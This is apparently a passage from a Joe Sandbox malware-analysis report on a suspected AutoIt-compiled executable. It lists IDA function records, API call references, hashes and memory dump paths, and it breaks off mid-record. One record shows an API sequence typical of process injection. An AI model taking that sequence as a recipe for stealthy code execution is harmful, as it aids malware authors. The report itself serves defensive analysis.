                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            • Opcode ID: aa7657af1c807b4a751c0424e4b94492cca53492c3fabfd6d62d54e43af8dbaa
                            • Instruction ID: 1c32e169e0352ce052a349c76a17345db1ae16a6c6ba2ae4bc5e423557c1b6af
                            • Opcode Fuzzy Hash: aa7657af1c807b4a751c0424e4b94492cca53492c3fabfd6d62d54e43af8dbaa
                            • Instruction Fuzzy Hash: 2501B539601201AAE6353BF5EC42ABE7388AFC7765F114525F6059B1D3DFF09C808666
                            APIs
                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000CCC71,?,?,?,?,?,00000004), ref: 000CCFE1
                            • SetFileTime.KERNEL32(00000000,?,00000000,?,?,000CCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000CCFF7
                            • CloseHandle.KERNEL32(00000000,?,000CCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CCFFE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 38539d6eece43f6f1b7f277dc800c2c618f1b4a4b7009828aef4adf1924ff762
                            • Instruction ID: 46359461b653b5efd1c3836d77e29acb6367f8ba5f7dffaae00d2240bf0383c9
                            • Opcode Fuzzy Hash: 38539d6eece43f6f1b7f277dc800c2c618f1b4a4b7009828aef4adf1924ff762
                            • Instruction Fuzzy Hash: 80E08632140218B7D7311B94BC09FCE7B19AB05770F104110FB54690E08BF165519798
                            APIs
                            • _free.LIBCMT ref: 000CC45E
                              • Part of subcall function 000A28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28DE
                              • Part of subcall function 000A28CA: GetLastError.KERNEL32(00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28F0
                            • _free.LIBCMT ref: 000CC46F
                            • _free.LIBCMT ref: 000CC481
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                            • Instruction ID: 7c6709d7c1110af65b0414410ed649d3977c8842d0063d1499464088789c7ba5
                            • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                            • Instruction Fuzzy Hash: B9E017A160270196EA6CABBDA854FFB63CC6F06761B14883EF44DD7183DF2CE8408138
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            • Opcode ID: b5dac53f51f2200d40789e572841718ba36947b161886e54c38c8514da86bcce
                            • Instruction ID: 1807859196ce7ddb2d8eba7920b8f8f3eb1166b885a40de8139222eb46544733
                            • Opcode Fuzzy Hash: b5dac53f51f2200d40789e572841718ba36947b161886e54c38c8514da86bcce
                            • Instruction Fuzzy Hash: F4226C70608341DFDB24DF24C490AAAB7E1FF85304F15896DE99A8B662D731E885EF42
                            APIs
                              • Part of subcall function 000816F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000814EB), ref: 00081751
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0008159B
                            • CoInitialize.OLE32(00000000), ref: 00081612
                            • CloseHandle.KERNEL32(00000000), ref: 000F58F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                            • String ID:
                            • API String ID: 3815369404-0
                            • Opcode ID: 29b8c7a73aff6bbe9defe8bba1933cc8e455999216a9d05868d06027614fc336
                            • Instruction ID: 1247f00dc3479cd3a17c08d95b1d6d1efc2c6025302c85cf789876b42d848ad4
                            • Opcode Fuzzy Hash: 29b8c7a73aff6bbe9defe8bba1933cc8e455999216a9d05868d06027614fc336
                            • Instruction Fuzzy Hash: 0E71DABC981344BBC304EF6AFA90494BBE9FB4A354798422ED04A9BA72DB7044C5CF15
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: EA06
                            • API String ID: 4104443479-3962188686
                            • Opcode ID: be0a5d12efde059816c5021ade233ef5795a7a78940f727b4310bfbe5e2b5b56
                            • Instruction ID: c9a956c10bf2b38db94d74e64ec78eb361daed12632a0ce6396a647e4185c3bb
                            • Opcode Fuzzy Hash: be0a5d12efde059816c5021ade233ef5795a7a78940f727b4310bfbe5e2b5b56
                            • Instruction Fuzzy Hash: FB415E21A0825A97CF21BB548C957FF7FE2BB55300F284575EAC2D7283D6318DC48BA1
                            Strings
                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 000F34AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                            • API String ID: 1029625771-2684727018
                            • Opcode ID: bead1c96d89b31b02b68ec6f6c23126cef61f29dfb730415c1aa5fbb6232ed48
                            • Instruction ID: 0f709a93b5b730553735292f9db789da7d3ff17a0771c86f17e2f1c83b0f558c
                            • Opcode Fuzzy Hash: bead1c96d89b31b02b68ec6f6c23126cef61f29dfb730415c1aa5fbb6232ed48
                            • Instruction Fuzzy Hash: BFF0447190120DAA8F11FFA4D8919FFB7B8BB50310B108526E85592183EB34AB09DB20
                            APIs
                            • _memmove.LIBCMT ref: 000A367B
                            • __flush.LIBCMT ref: 000A369B
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __flush__getptd_noexit_memmove
                            • String ID:
                            • API String ID: 3662107617-0
                            • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                            • Instruction ID: 59127bdfcd15d49f57e53b47b849ecfb4d48785d300f1ad50d25e50e3e8d2c8e
                            • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                            • Instruction Fuzzy Hash: 8F41A2B5704606AFDF688EE9C8815AE7BE5AB46360B24C63DF845C7250DB70DF408B40
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                            • Instruction ID: cb005fa94baa1c50f25a9bdb5e92eec6b9a13014a3ed53f01ebb8d30299ed7ea
                            • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                            • Instruction Fuzzy Hash: 273193B1600A06AFC714EF68C8D1E69F3E9FF493207558229E569CB691DF70E861CB90
                            APIs
                            • IsThemeActive.UXTHEME ref: 000836E6
                              • Part of subcall function 000A2025: __lock.LIBCMT ref: 000A202B
                              • Part of subcall function 000832DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000832F6
                              • Part of subcall function 000832DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0008330B
                              • Part of subcall function 0008374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0008376D
                              • Part of subcall function 0008374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0008377F
                              • Part of subcall function 0008374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00141120,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00141124,?,?), ref: 000837EE
                              • Part of subcall function 0008374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00083860
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00083726
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                            • String ID:
                            • API String ID: 924797094-0
                            • Opcode ID: b0c2f3dd29e1ecdc8a0e93df4d237bb85234ed19b141f8a868af34dfcfd8984e
                            • Instruction ID: 51a6c5fc89e988699c1886f918a52f9c50dfcc2902191ec0c7ed28b9314a66d9
                            • Opcode Fuzzy Hash: b0c2f3dd29e1ecdc8a0e93df4d237bb85234ed19b141f8a868af34dfcfd8984e
                            • Instruction Fuzzy Hash: 73118CB5908345ABC710EFA9EC4595ABBF8FBC5710F00451EF494876B2DBB09AC4CB92
                            APIs
                            • ___lock_fhandle.LIBCMT ref: 000AF7D9
                            • __close_nolock.LIBCMT ref: 000AF7F2
                              • Part of subcall function 000A886A: __getptd_noexit.LIBCMT ref: 000A886A
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                            • String ID:
                            • API String ID: 1046115767-0
                            • Opcode ID: 29b81e2d44dcb0cafdb920df5e83ebc5e6974a5c5baf1910df646e1b551e9385
                            • Instruction ID: 5d5fc1e789c480ff2d89d5b6e6312b9b9556cbdf1e60e03a5ed80e0955bf01a3
                            • Opcode Fuzzy Hash: 29b81e2d44dcb0cafdb920df5e83ebc5e6974a5c5baf1910df646e1b551e9385
                            • Instruction Fuzzy Hash: F3117C3290A6129ED7217FE4D8463AC7AA06F43331F668260E5745B1E3CFBC594087A1
                            APIs
                              • Part of subcall function 000A45EC: __FF_MSGBANNER.LIBCMT ref: 000A4603
                              • Part of subcall function 000A45EC: __NMSG_WRITE.LIBCMT ref: 000A460A
                              • Part of subcall function 000A45EC: RtlAllocateHeap.NTDLL(00A00000,00000000,00000001,?,?,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A462F
                            • std::exception::exception.LIBCMT ref: 000A013E
                            • __CxxThrowException@8.LIBCMT ref: 000A0153
                              • Part of subcall function 000A7495: RaiseException.KERNEL32(?,?,0008125D,00136598,?,?,?,000A0158,0008125D,00136598,?,00000001), ref: 000A74E6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID:
                            • API String ID: 3902256705-0
                            • Opcode ID: 2b477296e01f96006ead373f8e6cf8c0fbd10f735940b3341076abd8a989f226
                            • Instruction ID: 278a9d2bea6fbea14a81f33feaf14dbbc27aea04f0ff4400fe8c036d45b053db
                            • Opcode Fuzzy Hash: 2b477296e01f96006ead373f8e6cf8c0fbd10f735940b3341076abd8a989f226
                            • Instruction Fuzzy Hash: 9AF0C83910420DA6CB15ABE8DD029DEB7EC9F07350F104429F908A21C3DBB0868096A5
                            APIs
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • __lock_file.LIBCMT ref: 000A42B9
                              • Part of subcall function 000A5A9F: __lock.LIBCMT ref: 000A5AC2
                            • __fclose_nolock.LIBCMT ref: 000A42C4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: dd97f3ce7f7d31601fb3d09b8c71ab81796967e2efb2a5fa8375700d6742245d
                            • Instruction ID: 01ad9213740fa0116ee2f960715390f9bf5baa07efbfcf02f74789887a1ac8d1
                            • Opcode Fuzzy Hash: dd97f3ce7f7d31601fb3d09b8c71ab81796967e2efb2a5fa8375700d6742245d
                            • Instruction Fuzzy Hash: 38F090359056049AD720ABF58C027AE7BD06FC3334FA58219B8249B1C3CBBC89019B51
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 00A51403
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A51499
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A514BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                            • Instruction ID: 2f50cfe2d5ccc1695616ae37d35a398dceb2593e290cbe12c133b2157023f9f4
                            • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                            • Instruction Fuzzy Hash: 1C12EC20E24658C6EB24DF64D8507DEB232FF68301F1090E9910DEB7A5E77A4F85CB5A
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: b8e5fe03e6af98edc19456810fdb64137f6b9a462bb813502b7a96c90d45891d
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: 8731B570A00106AFCB58DF58D480A6DFBA5FB49350B6486A5E449CB255DB31EDC1EBD0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: e5f41a3f25d63fe6ed7c7293d2a84de2a8abd0d6d69390c5af0e299f37d4f784
                            • Instruction ID: b7d678a11f48a111f629e5376f63888d0c18c348a4be994fd4f7e371d98ef848
                            • Opcode Fuzzy Hash: e5f41a3f25d63fe6ed7c7293d2a84de2a8abd0d6d69390c5af0e299f37d4f784
                            • Instruction Fuzzy Hash: BA415E70608651CFDB24CF18C444B6ABBE1BF45308F19856CE9994B762C372E885DF52
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 9addedbf9276ae0f3aefa9ba152078eed992e84230754c7c9cd45e7fcfb81d2d
                            • Instruction ID: 0c7a4ca798a438d86103e3c5bd238ab81a46285a754b382c19ee31940be93eda
                            • Opcode Fuzzy Hash: 9addedbf9276ae0f3aefa9ba152078eed992e84230754c7c9cd45e7fcfb81d2d
                            • Instruction Fuzzy Hash: 2921F172600A09FBCB249F21EC417BD7BB4FB14390F21842AE586C5492EF30C5D0E715
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 9e0dbd13afd0d015ac2a562479df0c6f82842987197f50a2e5fbad89f4896f03
                            • Instruction ID: e6150924badade9761f96e461b56ecaadf9106796afd7aedba1c79d964661753
                            • Opcode Fuzzy Hash: 9e0dbd13afd0d015ac2a562479df0c6f82842987197f50a2e5fbad89f4896f03
                            • Instruction Fuzzy Hash: E3115E75600606DFD724DF28D481956B7F9FF49320B20C52EE88ECB662EB32E841CB50
                            APIs
                              • Part of subcall function 00083F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00083F90
                              • Part of subcall function 000A4129: __wfsopen.LIBCMT ref: 000A4134
                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000834E2,?,00000001), ref: 00083FCD
                              • Part of subcall function 00083E78: FreeLibrary.KERNEL32(00000000), ref: 00083EAB
                              • Part of subcall function 00084010: _memmove.LIBCMT ref: 0008405A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            • Opcode ID: 2da4aa6aa7ee93beb875a87d9be819c5aa0011b831f81d3bbda6a79454641931
                            • Instruction ID: cb857ea4386d73203572dceb2a266fb525a371512791c346aeaf04ca690ab7e4
                            • Opcode Fuzzy Hash: 2da4aa6aa7ee93beb875a87d9be819c5aa0011b831f81d3bbda6a79454641931
                            • Instruction Fuzzy Hash: CE11A731600216AACF14BB64DC16FDE76A5AF90B40F204429F581E71C2EFB09A459B50
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 53d1bf9de73b062b3e01921e97696e8951b6a516c3712ff420c21efc44ca0c18
                            • Instruction ID: 159ebf3172f0d4233b69605dc80b0cee6e97aa18799dac67c734e35fb9b44607
